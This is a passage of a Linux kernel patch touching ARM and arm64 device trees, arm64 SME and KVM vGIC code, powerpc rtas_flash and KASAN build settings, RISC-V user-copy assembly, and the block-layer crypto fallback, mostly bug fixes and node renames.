+index 57c21a01f126d..81a9a302aec1b 100644
+--- a/arch/arm/boot/dts/imx6qdl-nitrogen6_max.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-nitrogen6_max.dtsi
+@@ -181,13 +181,13 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		speaker-enable {
++		led-speaker-enable {
+ 			gpios = <&gpio1 29 GPIO_ACTIVE_HIGH>;
+ 			retain-state-suspended;
+ 			default-state = "off";
+ 		};
+ 
+-		ttymxc4-rs232 {
++		led-ttymxc4-rs232 {
+ 			gpios = <&gpio6 10 GPIO_ACTIVE_HIGH>;
+ 			retain-state-suspended;
+ 			default-state = "on";
+diff --git a/arch/arm/boot/dts/imx6qdl-phytec-mira.dtsi b/arch/arm/boot/dts/imx6qdl-phytec-mira.dtsi
+index 120d6e997a4c5..1ca4d219609f6 100644
+--- a/arch/arm/boot/dts/imx6qdl-phytec-mira.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-phytec-mira.dtsi
+@@ -25,17 +25,17 @@
+ 		pinctrl-0 = <&pinctrl_gpioleds>;
+ 		status = "disabled";
+ 
+-		red {
++		led-red {
+ 			label = "phyboard-mira:red";
+ 			gpios = <&gpio5 22 GPIO_ACTIVE_HIGH>;
+ 		};
+ 
+-		green {
++		led-green {
+ 			label = "phyboard-mira:green";
+ 			gpios = <&gpio5 23 GPIO_ACTIVE_HIGH>;
+ 		};
+ 
+-		blue {
++		led-blue {
+ 			label = "phyboard-mira:blue";
+ 			gpios = <&gpio5 24 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "mmc0";
+@@ -182,7 +182,7 @@
+ 		pinctrl-0 = <&pinctrl_rtc_int>;
+ 		reg = <0x68>;
+ 		interrupt-parent = <&gpio7>;
+-		interrupts = <8 IRQ_TYPE_LEVEL_HIGH>;
++		interrupts = <8 IRQ_TYPE_LEVEL_LOW>;
+ 		status = "disabled";
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/imx6qdl-phytec-pfla02.dtsi b/arch/arm/boot/dts/imx6qdl-phytec-pfla02.dtsi
+index 768bc0e3a2b38..80adb2a02cc94 100644
+--- a/arch/arm/boot/dts/imx6qdl-phytec-pfla02.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-phytec-pfla02.dtsi
+@@ -47,12 +47,12 @@
+ 		pinctrl-0 = <&pinctrl_leds>;
+ 		compatible = "gpio-leds";
+ 
+-		led_green: green {
++		led_green: led-green {
+ 			label = "phyflex:green";
+ 			gpios = <&gpio1 30 0>;
+ 		};
+ 
+-		led_red: red {
++		led_red: led-red {
+ 			label = "phyflex:red";
+ 			gpios = <&gpio2 31 0>;
+ 		};
+diff --git a/arch/arm/boot/dts/imx6qdl-prti6q.dtsi b/arch/arm/boot/dts/imx6qdl-prti6q.dtsi
+index f0db0d4471f40..36f84f4da6b0d 100644
+--- a/arch/arm/boot/dts/imx6qdl-prti6q.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-prti6q.dtsi
+@@ -69,6 +69,7 @@
+ 	vbus-supply = <&reg_usb_h1_vbus>;
+ 	phy_type = "utmi";
+ 	dr_mode = "host";
++	disable-over-current;
+ 	status = "okay";
+ };
+ 
+@@ -78,10 +79,18 @@
+ 	pinctrl-0 = <&pinctrl_usbotg>;
+ 	phy_type = "utmi";
+ 	dr_mode = "host";
+-	disable-over-current;
++	over-current-active-low;
+ 	status = "okay";
+ };
+ 
++&usbphynop1 {
++	status = "disabled";
++};
++
++&usbphynop2 {
++	status = "disabled";
++};
++
+ &usdhc1 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_usdhc1>;
+diff --git a/arch/arm/boot/dts/imx6qdl-rex.dtsi b/arch/arm/boot/dts/imx6qdl-rex.dtsi
+index de514eb5aa99d..f804ff95a6ad6 100644
+--- a/arch/arm/boot/dts/imx6qdl-rex.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-rex.dtsi
+@@ -55,7 +55,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		led0: usr {
++		led0: led-usr {
+ 			label = "usr";
+ 			gpios = <&gpio1 2 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-sabreauto.dtsi b/arch/arm/boot/dts/imx6qdl-sabreauto.dtsi
+index 3dbb460ef102e..10886a1461bfb 100644
+--- a/arch/arm/boot/dts/imx6qdl-sabreauto.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-sabreauto.dtsi
+@@ -21,7 +21,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		user {
++		led-user {
+ 			label = "debug";
+ 			gpios = <&gpio5 15 GPIO_ACTIVE_HIGH>;
+ 		};
+diff --git a/arch/arm/boot/dts/imx6qdl-sabresd.dtsi b/arch/arm/boot/dts/imx6qdl-sabresd.dtsi
+index 37482a9023fce..bcb83d52e26ed 100644
+--- a/arch/arm/boot/dts/imx6qdl-sabresd.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-sabresd.dtsi
+@@ -130,7 +130,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		red {
++		led-red {
+ 			gpios = <&gpio1 2 0>;
+ 			default-state = "on";
+ 		};
+diff --git a/arch/arm/boot/dts/imx6qdl-ts7970.dtsi b/arch/arm/boot/dts/imx6qdl-ts7970.dtsi
+index c096d25a6f5b5..1e0a041e9f60a 100644
+--- a/arch/arm/boot/dts/imx6qdl-ts7970.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-ts7970.dtsi
+@@ -73,13 +73,13 @@
+ 			default-state = "off";
+ 		};
+ 
+-		en-usb-5v {
++		en-usb-5v-led {
+ 			label = "en-usb-5v";
+ 			gpios = <&gpio2 22 GPIO_ACTIVE_HIGH>;
+ 			default-state = "on";
+ 		};
+ 
+-		sel_dc_usb {
++		sel-dc-usb-led {
+ 			label = "sel_dc_usb";
+ 			gpios = <&gpio5 17 GPIO_ACTIVE_HIGH>;
+ 			default-state = "off";
+diff --git a/arch/arm/boot/dts/imx6qdl-tx6.dtsi b/arch/arm/boot/dts/imx6qdl-tx6.dtsi
+index f41f86a76ea95..a197bac95cbac 100644
+--- a/arch/arm/boot/dts/imx6qdl-tx6.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-tx6.dtsi
+@@ -92,7 +92,7 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		user_led: user {
++		user_led: led-user {
+ 			label = "Heartbeat";
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pinctrl_user_led>;
+diff --git a/arch/arm/boot/dts/imx6sl-evk.dts b/arch/arm/boot/dts/imx6sl-evk.dts
+index f16c830f1e918..dc5d596c18db4 100644
+--- a/arch/arm/boot/dts/imx6sl-evk.dts
++++ b/arch/arm/boot/dts/imx6sl-evk.dts
+@@ -33,7 +33,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user {
++		led-user {
+ 			label = "debug";
+ 			gpios = <&gpio3 20 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx6sll-evk.dts b/arch/arm/boot/dts/imx6sll-evk.dts
+index 32b3d82fec53c..269092ac881c5 100644
+--- a/arch/arm/boot/dts/imx6sll-evk.dts
++++ b/arch/arm/boot/dts/imx6sll-evk.dts
+@@ -37,7 +37,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user {
++		led-user {
+ 			label = "debug";
+ 			gpios = <&gpio2 4 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx6sll.dtsi b/arch/arm/boot/dts/imx6sll.dtsi
+index 2873369a57c02..3659fd5ecfa62 100644
+--- a/arch/arm/boot/dts/imx6sll.dtsi
++++ b/arch/arm/boot/dts/imx6sll.dtsi
+@@ -552,7 +552,7 @@
+ 				reg = <0x020ca000 0x1000>;
+ 				interrupts = <GIC_SPI 41 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX6SLL_CLK_USBPHY2>;
+-				phy-reg_3p0-supply = <&reg_3p0>;
++				phy-3p0-supply = <&reg_3p0>;
+ 				fsl,anatop = <&anatop>;
+ 			};
+ 
+diff --git a/arch/arm/boot/dts/imx6sx-sabreauto.dts b/arch/arm/boot/dts/imx6sx-sabreauto.dts
+index 83ee97252ff11..b0c27b9b02446 100644
+--- a/arch/arm/boot/dts/imx6sx-sabreauto.dts
++++ b/arch/arm/boot/dts/imx6sx-sabreauto.dts
+@@ -20,7 +20,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_led>;
+ 
+-		user {
++		led-user {
+ 			label = "debug";
+ 			gpios = <&gpio1 24 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx6sx-udoo-neo.dtsi b/arch/arm/boot/dts/imx6sx-udoo-neo.dtsi
+index c84ea1fac5e98..725d0b5cb55f6 100644
+--- a/arch/arm/boot/dts/imx6sx-udoo-neo.dtsi
++++ b/arch/arm/boot/dts/imx6sx-udoo-neo.dtsi
+@@ -15,14 +15,14 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		red {
++		led-red {
+ 			label = "udoo-neo:red:mmc";
+ 			gpios = <&gpio6 0 GPIO_ACTIVE_HIGH>;
+ 			default-state = "off";
+ 			linux,default-trigger = "mmc0";
+ 		};
+ 
+-		orange {
++		led-orange {
+ 			label = "udoo-neo:orange:user";
+ 			gpios = <&gpio4 6 GPIO_ACTIVE_HIGH>;
+ 			default-state = "keep";
+diff --git a/arch/arm/boot/dts/imx6sx.dtsi b/arch/arm/boot/dts/imx6sx.dtsi
+index abc3572d699e6..1f1053a898fbf 100644
+--- a/arch/arm/boot/dts/imx6sx.dtsi
++++ b/arch/arm/boot/dts/imx6sx.dtsi
+@@ -981,6 +981,8 @@
+ 					 <&clks IMX6SX_CLK_USDHC1>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-start-tap = <20>;
++				fsl,tuning-step= <2>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -993,6 +995,8 @@
+ 					 <&clks IMX6SX_CLK_USDHC2>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-start-tap = <20>;
++				fsl,tuning-step= <2>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -1005,6 +1009,8 @@
+ 					 <&clks IMX6SX_CLK_USDHC3>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-start-tap = <20>;
++				fsl,tuning-step= <2>;
+ 				status = "disabled";
+ 			};
+ 
+diff --git a/arch/arm/boot/dts/imx6ul-phytec-phycore-som.dtsi b/arch/arm/boot/dts/imx6ul-phytec-phycore-som.dtsi
+index 3cddc68917a08..e4d2652a75c0b 100644
+--- a/arch/arm/boot/dts/imx6ul-phytec-phycore-som.dtsi
++++ b/arch/arm/boot/dts/imx6ul-phytec-phycore-som.dtsi
+@@ -30,7 +30,7 @@
+ 		pinctrl-0 = <&pinctrl_gpioleds_som>;
+ 		compatible = "gpio-leds";
+ 
+-		phycore-green {
++		led-phycore-green {
+ 			gpios = <&gpio5 4 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+ 		};
+diff --git a/arch/arm/boot/dts/imx6ul-tx6ul.dtsi b/arch/arm/boot/dts/imx6ul-tx6ul.dtsi
+index 15ee0275feaff..70cef5e817bd1 100644
+--- a/arch/arm/boot/dts/imx6ul-tx6ul.dtsi
++++ b/arch/arm/boot/dts/imx6ul-tx6ul.dtsi
+@@ -131,7 +131,7 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		user_led: user {
++		user_led: led-user {
+ 			label = "Heartbeat";
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pinctrl_led>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm.dtsi b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+index 420ba0d6f1343..12c82bb1bb7aa 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+@@ -1145,10 +1145,9 @@
+ 				compatible = "fsl,imx8mm-mipi-csi2";
+ 				reg = <0x32e30000 0x1000>;
+ 				interrupts = <GIC_SPI 17 IRQ_TYPE_LEVEL_HIGH>;
+-				assigned-clocks = <&clk IMX8MM_CLK_CSI1_CORE>,
+-						  <&clk IMX8MM_CLK_CSI1_PHY_REF>;
+-				assigned-clock-parents = <&clk IMX8MM_SYS_PLL2_1000M>,
+-							  <&clk IMX8MM_SYS_PLL2_1000M>;
++				assigned-clocks = <&clk IMX8MM_CLK_CSI1_CORE>;
++				assigned-clock-parents = <&clk IMX8MM_SYS_PLL2_1000M>;
++
+ 				clock-frequency = <333000000>;
+ 				clocks = <&clk IMX8MM_CLK_DISP_APB_ROOT>,
+ 					 <&clk IMX8MM_CLK_CSI1_ROOT>,
+diff --git a/arch/arm64/boot/dts/freescale/imx93.dtsi b/arch/arm64/boot/dts/freescale/imx93.dtsi
+index 8ab9f8194702e..c2f60d41d6fd1 100644
+--- a/arch/arm64/boot/dts/freescale/imx93.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx93.dtsi
+@@ -254,7 +254,7 @@
+ 
+ 			anatop: anatop@44480000 {
+ 				compatible = "fsl,imx93-anatop", "syscon";
+-				reg = <0x44480000 0x10000>;
++				reg = <0x44480000 0x2000>;
+ 			};
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts b/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
+index bf8077a1cf9a7..9731a7c63d53b 100644
+--- a/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
++++ b/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
+@@ -121,7 +121,7 @@
+ 			};
+ 		};
+ 
+-		pm8150l-thermal {
++		pm8150l-pcb-thermal {
+ 			polling-delay-passive = <0>;
+ 			polling-delay = <0>;
+ 			thermal-sensors = <&pm8150l_adc_tm 1>;
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-rock-4c-plus.dts b/arch/arm64/boot/dts/rockchip/rk3399-rock-4c-plus.dts
+index f9884902f8745..c3f53aa1ea4ac 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-rock-4c-plus.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3399-rock-4c-plus.dts
+@@ -548,9 +548,8 @@
+ &sdhci {
+ 	max-frequency = <150000000>;
+ 	bus-width = <8>;
+-	mmc-hs400-1_8v;
++	mmc-hs200-1_8v;
+ 	non-removable;
+-	mmc-hs400-enhanced-strobe;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
+index 1f76d3501bda3..9bdc0b93001f4 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
+@@ -45,7 +45,7 @@
+ 	sdio_pwrseq: sdio-pwrseq {
+ 		compatible = "mmc-pwrseq-simple";
+ 		clocks = <&rk808 1>;
+-		clock-names = "ext_clock";
++		clock-names = "lpo";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&wifi_enable_h>;
+ 		reset-gpios = <&gpio0 RK_PB2 GPIO_ACTIVE_LOW>;
+@@ -645,9 +645,9 @@
+ };
+ 
+ &sdhci {
++	max-frequency = <150000000>;
+ 	bus-width = <8>;
+-	mmc-hs400-1_8v;
+-	mmc-hs400-enhanced-strobe;
++	mmc-hs200-1_8v;
+ 	non-removable;
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/include/asm/fpsimd.h b/arch/arm64/include/asm/fpsimd.h
+index 6f86b7ab6c28f..d720b6f7e5f9c 100644
+--- a/arch/arm64/include/asm/fpsimd.h
++++ b/arch/arm64/include/asm/fpsimd.h
+@@ -339,7 +339,7 @@ static inline int sme_max_virtualisable_vl(void)
+ 	return vec_max_virtualisable_vl(ARM64_VEC_SME);
+ }
+ 
+-extern void sme_alloc(struct task_struct *task);
++extern void sme_alloc(struct task_struct *task, bool flush);
+ extern unsigned int sme_get_vl(void);
+ extern int sme_set_current_vl(unsigned long arg);
+ extern int sme_get_current_vl(void);
+@@ -365,7 +365,7 @@ static inline void sme_smstart_sm(void) { }
+ static inline void sme_smstop_sm(void) { }
+ static inline void sme_smstop(void) { }
+ 
+-static inline void sme_alloc(struct task_struct *task) { }
++static inline void sme_alloc(struct task_struct *task, bool flush) { }
+ static inline void sme_setup(void) { }
+ static inline unsigned int sme_get_vl(void) { return 0; }
+ static inline int sme_max_vl(void) { return 0; }
+diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
+index b5a8e8b3c691c..577cf444c1135 100644
+--- a/arch/arm64/include/asm/kvm_host.h
++++ b/arch/arm64/include/asm/kvm_host.h
+@@ -559,6 +559,8 @@ struct kvm_vcpu_arch {
+ #define SYSREGS_ON_CPU		__vcpu_single_flag(sflags, BIT(4))
+ /* Software step state is Active-pending */
+ #define DBG_SS_ACTIVE_PENDING	__vcpu_single_flag(sflags, BIT(5))
++/* WFI instruction trapped */
++#define IN_WFI			__vcpu_single_flag(sflags, BIT(7))
+ 
+ 
+ /* Pointer to the vcpu's SVE FFR for sve_{save,load}_state() */
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 356036babd093..8cd59d387b90b 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -1239,9 +1239,9 @@ void fpsimd_release_task(struct task_struct *dead_task)
+  * the interest of testability and predictability, the architecture
+  * guarantees that when ZA is enabled it will be zeroed.
+  */
+-void sme_alloc(struct task_struct *task)
++void sme_alloc(struct task_struct *task, bool flush)
+ {
+-	if (task->thread.za_state) {
++	if (task->thread.za_state && flush) {
+ 		memset(task->thread.za_state, 0, za_state_size(task));
+ 		return;
+ 	}
+@@ -1460,7 +1460,7 @@ void do_sme_acc(unsigned long esr, struct pt_regs *regs)
+ 	}
+ 
+ 	sve_alloc(current, false);
+-	sme_alloc(current);
++	sme_alloc(current, true);
+ 	if (!current->thread.sve_state || !current->thread.za_state) {
+ 		force_sig(SIGKILL);
+ 		return;
+diff --git a/arch/arm64/kernel/ptrace.c b/arch/arm64/kernel/ptrace.c
+index f19f020ccff96..f606c942f514e 100644
+--- a/arch/arm64/kernel/ptrace.c
++++ b/arch/arm64/kernel/ptrace.c
+@@ -886,6 +886,13 @@ static int sve_set_common(struct task_struct *target,
+ 			break;
+ 		case ARM64_VEC_SME:
+ 			target->thread.svcr |= SVCR_SM_MASK;
++
++			/*
++			 * Disable traps and ensure there is SME storage but
++			 * preserve any currently set values in ZA/ZT.
++			 */
++			sme_alloc(target, false);
++			set_tsk_thread_flag(target, TIF_SME);
+ 			break;
+ 		default:
+ 			WARN_ON_ONCE(1);
+@@ -1107,7 +1114,7 @@ static int za_set(struct task_struct *target,
+ 	}
+ 
+ 	/* Allocate/reinit ZA storage */
+-	sme_alloc(target);
++	sme_alloc(target, true);
+ 	if (!target->thread.za_state) {
+ 		ret = -ENOMEM;
+ 		goto out;
+diff --git a/arch/arm64/kernel/signal.c b/arch/arm64/kernel/signal.c
+index 43adbfa5ead78..82f4572c8ddfc 100644
+--- a/arch/arm64/kernel/signal.c
++++ b/arch/arm64/kernel/signal.c
+@@ -430,7 +430,7 @@ static int restore_za_context(struct user_ctxs *user)
+ 	fpsimd_flush_task_state(current);
+ 	/* From now, fpsimd_thread_switch() won't touch thread.sve_state */
+ 
+-	sme_alloc(current);
++	sme_alloc(current, true);
+ 	if (!current->thread.za_state) {
+ 		current->thread.svcr &= ~SVCR_ZA_MASK;
+ 		clear_thread_flag(TIF_SME);
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index 35481d51aada8..6cc380a15eb76 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -692,13 +692,15 @@ void kvm_vcpu_wfi(struct kvm_vcpu *vcpu)
+ 	 */
+ 	preempt_disable();
+ 	kvm_vgic_vmcr_sync(vcpu);
+-	vgic_v4_put(vcpu, true);
++	vcpu_set_flag(vcpu, IN_WFI);
++	vgic_v4_put(vcpu);
+ 	preempt_enable();
+ 
+ 	kvm_vcpu_halt(vcpu);
+ 	vcpu_clear_flag(vcpu, IN_WFIT);
+ 
+ 	preempt_disable();
++	vcpu_clear_flag(vcpu, IN_WFI);
+ 	vgic_v4_load(vcpu);
+ 	preempt_enable();
+ }
+@@ -766,7 +768,7 @@ static int check_vcpu_requests(struct kvm_vcpu *vcpu)
+ 		if (kvm_check_request(KVM_REQ_RELOAD_GICv4, vcpu)) {
+ 			/* The distributor enable bits were changed */
+ 			preempt_disable();
+-			vgic_v4_put(vcpu, false);
++			vgic_v4_put(vcpu);
+ 			vgic_v4_load(vcpu);
+ 			preempt_enable();
+ 		}
+diff --git a/arch/arm64/kvm/vgic/vgic-v3.c b/arch/arm64/kvm/vgic/vgic-v3.c
+index f86c3007a319c..1f8eea53e982f 100644
+--- a/arch/arm64/kvm/vgic/vgic-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-v3.c
+@@ -742,7 +742,7 @@ void vgic_v3_put(struct kvm_vcpu *vcpu)
+ {
+ 	struct vgic_v3_cpu_if *cpu_if = &vcpu->arch.vgic_cpu.vgic_v3;
+ 
+-	WARN_ON(vgic_v4_put(vcpu, false));
++	WARN_ON(vgic_v4_put(vcpu));
+ 
+ 	vgic_v3_vmcr_sync(vcpu);
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-v4.c b/arch/arm64/kvm/vgic/vgic-v4.c
+index c1c28fe680ba3..339a55194b2c6 100644
+--- a/arch/arm64/kvm/vgic/vgic-v4.c
++++ b/arch/arm64/kvm/vgic/vgic-v4.c
+@@ -336,14 +336,14 @@ void vgic_v4_teardown(struct kvm *kvm)
+ 	its_vm->vpes = NULL;
+ }
+ 
+-int vgic_v4_put(struct kvm_vcpu *vcpu, bool need_db)
++int vgic_v4_put(struct kvm_vcpu *vcpu)
+ {
+ 	struct its_vpe *vpe = &vcpu->arch.vgic_cpu.vgic_v3.its_vpe;
+ 
+ 	if (!vgic_supports_direct_msis(vcpu->kvm) || !vpe->resident)
+ 		return 0;
+ 
+-	return its_make_vpe_non_resident(vpe, need_db);
++	return its_make_vpe_non_resident(vpe, !!vcpu_get_flag(vcpu, IN_WFI));
+ }
+ 
+ int vgic_v4_load(struct kvm_vcpu *vcpu)
+@@ -354,6 +354,9 @@ int vgic_v4_load(struct kvm_vcpu *vcpu)
+ 	if (!vgic_supports_direct_msis(vcpu->kvm) || vpe->resident)
+ 		return 0;
+ 
++	if (vcpu_get_flag(vcpu, IN_WFI))
++		return 0;
++
+ 	/*
+ 	 * Before making the VPE resident, make sure the redistributor
+ 	 * corresponding to our current CPU expects us here. See the
+diff --git a/arch/powerpc/kernel/rtas_flash.c b/arch/powerpc/kernel/rtas_flash.c
+index bc817a5619d64..43c635ddba709 100644
+--- a/arch/powerpc/kernel/rtas_flash.c
++++ b/arch/powerpc/kernel/rtas_flash.c
+@@ -710,9 +710,9 @@ static int __init rtas_flash_init(void)
+ 	if (!rtas_validate_flash_data.buf)
+ 		return -ENOMEM;
+ 
+-	flash_block_cache = kmem_cache_create("rtas_flash_cache",
+-					      RTAS_BLK_SIZE, RTAS_BLK_SIZE, 0,
+-					      NULL);
++	flash_block_cache = kmem_cache_create_usercopy("rtas_flash_cache",
++						       RTAS_BLK_SIZE, RTAS_BLK_SIZE,
++						       0, 0, RTAS_BLK_SIZE, NULL);
+ 	if (!flash_block_cache) {
+ 		printk(KERN_ERR "%s: failed to create block cache\n",
+ 				__func__);
+diff --git a/arch/powerpc/mm/kasan/Makefile b/arch/powerpc/mm/kasan/Makefile
+index 699eeffd9f551..f9522fd70b2f3 100644
+--- a/arch/powerpc/mm/kasan/Makefile
++++ b/arch/powerpc/mm/kasan/Makefile
+@@ -1,6 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+ KASAN_SANITIZE := n
++KCOV_INSTRUMENT := n
+ 
+ obj-$(CONFIG_PPC32)		+= init_32.o
+ obj-$(CONFIG_PPC_8xx)		+= 8xx.o
+diff --git a/arch/riscv/lib/uaccess.S b/arch/riscv/lib/uaccess.S
+index ec486e5369d9b..09b47ebacf2e8 100644
+--- a/arch/riscv/lib/uaccess.S
++++ b/arch/riscv/lib/uaccess.S
+@@ -17,8 +17,11 @@ ENTRY(__asm_copy_from_user)
+ 	li t6, SR_SUM
+ 	csrs CSR_STATUS, t6
+ 
+-	/* Save for return value */
+-	mv	t5, a2
++	/*
++	 * Save the terminal address which will be used to compute the number
++	 * of bytes copied in case of a fixup exception.
++	 */
++	add	t5, a0, a2
+ 
+ 	/*
+ 	 * Register allocation for code below:
+@@ -176,7 +179,7 @@ ENTRY(__asm_copy_from_user)
+ 10:
+ 	/* Disable access to user memory */
+ 	csrc CSR_STATUS, t6
+-	mv a0, t5
++	sub a0, t5, a0
+ 	ret
+ ENDPROC(__asm_copy_to_user)
+ ENDPROC(__asm_copy_from_user)
+@@ -228,7 +231,7 @@ ENTRY(__clear_user)
+ 11:
+ 	/* Disable access to user memory */
+ 	csrc CSR_STATUS, t6
+-	mv a0, a1
++	sub a0, a3, a0
+ 	ret
+ ENDPROC(__clear_user)
+ EXPORT_SYMBOL(__clear_user)
+diff --git a/block/blk-crypto-fallback.c b/block/blk-crypto-fallback.c
+index ad9844c5b40cb..e6468eab2681e 100644
+--- a/block/blk-crypto-fallback.c
++++ b/block/blk-crypto-fallback.c
+@@ -78,7 +78,7 @@ static struct blk_crypto_fallback_keyslot {
+ 	struct crypto_skcipher *tfms[BLK_ENCRYPTION_MODE_MAX];
+ } *blk_crypto_keyslots;
+ 
+-static struct blk_crypto_profile blk_crypto_fallback_profile;
++static struct blk_crypto_profile *blk_crypto_fallback_profile;
+ static struct workqueue_struct *blk_crypto_wq;
+ static mempool_t *blk_crypto_bounce_page_pool;
+ static struct bio_set crypto_bio_split;
+@@ -292,7 +292,7 @@ static bool blk_crypto_fallback_encrypt_bio(struct bio **bio_ptr)
+ 	 * Get a blk-crypto-fallback keyslot that contains a crypto_skcipher for
+ 	 * this bio's algorithm and key.
+ 	 */
+-	blk_st = blk_crypto_get_keyslot(&blk_crypto_fallback_profile,
++	blk_st = blk_crypto_get_keyslot(blk_crypto_fallback_profile,
+ 					bc->bc_key, &slot);
+ 	if (blk_st != BLK_STS_OK) {
+ 		src_bio->bi_status = blk_st;
+@@ -395,7 +395,7 @@ static void blk_crypto_fallback_decrypt_bio(struct work_struct *work)
+ 	 * Get a blk-crypto-fallback keyslot that contains a crypto_skcipher for
+ 	 * this bio's algorithm and key.
+ 	 */
+-	blk_st = blk_crypto_get_keyslot(&blk_crypto_fallback_profile,
++	blk_st = blk_crypto_get_keyslot(blk_crypto_fallback_profile,
+ 					bc->bc_key, &slot);
+ 	if (blk_st != BLK_STS_OK) {
+ 		bio->bi_status = blk_st;
+@@ -499,7 +499,7 @@ bool blk_crypto_fallback_bio_prep(struct bio **bio_ptr)
+ 		return false;
+ 	}
+ 
+-	if (!__blk_crypto_cfg_supported(&blk_crypto_fallback_profile,
++	if (!__blk_crypto_cfg_supported(blk_crypto_fallback_profile,
+ 					&bc->bc_key->crypto_cfg)) {
+ 		bio->bi_status = BLK_STS_NOTSUPP;
+ 		return false;
+@@ -526,7 +526,7 @@ bool blk_crypto_fallback_bio_prep(struct bio **bio_ptr)
+ 
+ int blk_crypto_fallback_evict_key(const struct blk_crypto_key *key)
+ {
+-	return __blk_crypto_evict_key(&blk_crypto_fallback_profile, key);
++	return __blk_crypto_evict_key(blk_crypto_fallback_profile, key);
+ }
+ 
+ static bool blk_crypto_fallback_inited;
+@@ -534,7 +534,6 @@ static int blk_crypto_fallback_init(void)
+ {
+ 	int i;
+ 	int err;
+-	struct blk_crypto_profile *profile = &blk_crypto_fallback_profile;
+ 
+ 	if (blk_crypto_fallback_inited)
+ 		return 0;
+@@ -545,18 +544,27 @@ static int blk_crypto_fallback_init(void)
+ 	if (err)
+ 		goto out;
+ 
+-	err = blk_crypto_profile_init(profile, blk_crypto_num_keyslots);
+-	if (err)
++	/* Dynamic allocation is needed because of lockdep_register_key(). */
++	blk_crypto_fallback_profile =
++		kzalloc(sizeof(*blk_crypto_fallback_profile), GFP_KERNEL);
++	if (!blk_crypto_fallback_profile) {
++		err = -ENOMEM;
+ 		goto fail_free_bioset;
++	}
++
++	err = blk_crypto_profile_init(blk_crypto_fallback_profile,
++				      blk_crypto_num_keyslots);
++	if (err)
++		goto fail_free_profile;
+ 	err = -ENOMEM;
+ 
+-	profile->ll_ops = blk_crypto_fallback_ll_ops;
+-	profile->max_dun_bytes_supported = BLK_CRYPTO_MAX_IV_SIZE;
++	blk_crypto_fallback_profile->ll_ops = blk_crypto_fallback_ll_ops;
++	blk_crypto_fallback_profile->max_dun_bytes_supported = BLK_CRYPTO_MAX_IV_SIZE;
+ 
+ 	/* All blk-crypto modes have a crypto API fallback. */
+ 	for (i = 0; i < BLK_ENCRYPTION_MODE_MAX; i++)
